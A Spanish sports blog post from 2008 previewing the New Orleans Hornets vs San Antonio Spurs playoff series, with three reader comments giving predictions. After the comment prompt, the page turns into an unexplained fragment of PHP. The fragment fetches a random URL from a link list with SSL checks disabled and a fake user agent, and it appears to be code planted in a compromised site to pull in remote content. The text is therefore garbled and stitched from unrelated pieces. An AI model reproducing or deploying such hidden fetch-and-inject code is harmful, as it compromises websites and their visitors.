¿Superarán los Hornets la media noche?

03 de May de 2008 por Viva_Dirk

Esta noche comienza la eliminatoria entre 2º y 3º de la conferencia Oeste mas fuerte que se recuerda. Los Hornets están viviendo su particular cuento de la cenicienta, con una estrella de solo 22 años que ya aspira al MVP, el mejor entrenador del año, un equipo joven y que se ha quitado la presión de su primera experiencia en Playoffs con un 4-1 a la plantilla mas cara de la liga. Pero si en este cuento de la cenicienta para los Hornets hay una ‘hermanastra’, esos son los Spurs, el equipo mas duro y mas sucio de la liga, capaces de decidir una eliminatoria pegando literalmente a la estrella contraria como el año pasado o de llevar a cabo el ‘cazar a Shaq’ desde el tercer cuarto. Exceptuando a Tony Parker, todos sus hombres importantes llegan a los 30 años o los superan ampliamente; en definitiva, conocen el camino del éxito y no les importa lo que tengan que hacer para volver a llevarse el anillo.

La eliminatoria en si se presenta como un duelo impresionante, pero podemos dividirlo en varios frentes:

Paul VS Parker: El ex de Wake Forest se comió literalmente a Jason Kidd y cerró la primera ronda con un triple-doble. Su entendimiento del juego y sus números asustan. Mientras, Parker ha destrozado a los Suns con casi 30 puntos por encuentro y porcentajes por encima del 50% en tiros, sabe coger el mando cuando le toca, ejecutar el pick&roll con Duncan y dejar paso a Ginobili si es necesario, todo un veterano de 25 años. Paul ha demostrado este año ser mejor defensor que el francés, la capacidad para frenar sus penetraciones se antoja fundamental ya que si no necesita ayudas de los hombres interiores la influencia de Parker en el juego disminuye considerablemente.

Scott VS Popovich: Ambos muy bien considerados en la liga, ambos han sido entrenador del año y ambos de caracter fuerte, capaces de imponerse a las individualidades y crear un grupo unido. Scott cuenta con menos efectivos, su rotación contra Dallas se limitó a 8 hombres, con Paul y West en 40 minutos y mucha variante en el puesto de escolta. Popovich tiene un ejercito amplio, ha llegado a utilizar hasta 11 jugadores y no tiene reparo en sacar al que menos en consideración tiene para hacer faltas, una de las dudas que tenemos es si llevará a cabo el ‘cazar a Chandler’.

Energía VS Experiencia: El papel que haga Tyson Chandler frente a Tim Duncan será clave para el transcurrir de la serie. Si se carga de faltas rápidamente como le sucede a veces, la zona de los Hornets quedará a merced de Duncan y de la penetraciones de Parker, si por el contrario es capaz de permanecer en cancha el mayor número de minutos posibles, su sola presencia frenará en la medida de lo posible la anotación interior de los Spurs. De igual modo la intensidad que pueda aportar Pargo y Wright frente a un equipo con menos físico pero mas experimentado puede tomar 2 caminos; la precipitación o saber esperar su momento, en una eliminatoria como esta no se puede dejar ningun detalle sin mencionar.

A Ginobili no lo nombramos en ninguna clave, sabemos de lo que es capaz de argentino y hacerlo o no solo dependerá de el, porque los Hornets no cuentan con nadie que pueda soñar con pararle.

Veremos como acaba el cuento.

Pronóstico: siempre nos han gustado los cuentos con final feliz, así que pese a ser una eliminatoria de partidos muy igualados, New Orleans 4- San Antonio 1.

Comenta

3 comentarios a esta entrada

  1. Gallis dice:
    #1

    Bueno, habrá que ir mojándose…

    Me encantaría que ganaran los Hornets, pero creo que hasta aquí llega la cuento. Lo que los Spurs han demostrado contra los Suns a mí me tiene totalmente impactado…y aunque parezca que ya está todo resuelto en ese sentido, creo que es ahora donde la inexperiencia de los pupilos de Scott se va a notar. Mi apuesta, 2-4 para los Spurs…y si se llegara a un séptimo, también apostaría por los tejanos.

    Lo que espero es que sean todos unos partizados!!!

      Citar

  2. TheDeerHunter dice:
    #2

    Añadir que en temporada regular hay un 2-2. (ambos 1-1 en casa)
    Los Hornets les han cascado 2 de las 3 peores derrotas que ha sufrido SA esta temporada.

    Si tuviera que apostar lo haría por San Antonio… me la juego y pronostico 7 partidos.

    Viva_Dirk ha hablado con acierto de Ginobili. No olvidemos a David West, que puede ser decisivo por lo atípico que es ¿lo defenderá Duncan??estoy deseando ver cómo afrontaran esa defensa.

    apasionante!!!!

      Citar

  3. xapa_croack dice:
    #3

    dice juego sucio de los spurs, es pq no has visto la eliminatoria de los wizards, madre mia las que se ha llevado lebroncio.

    JOer un 4-1 es un tirarse a la piscina.

    Yo como gallis 2-4 para Spurs.

    We believe in manudo ¡¡

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>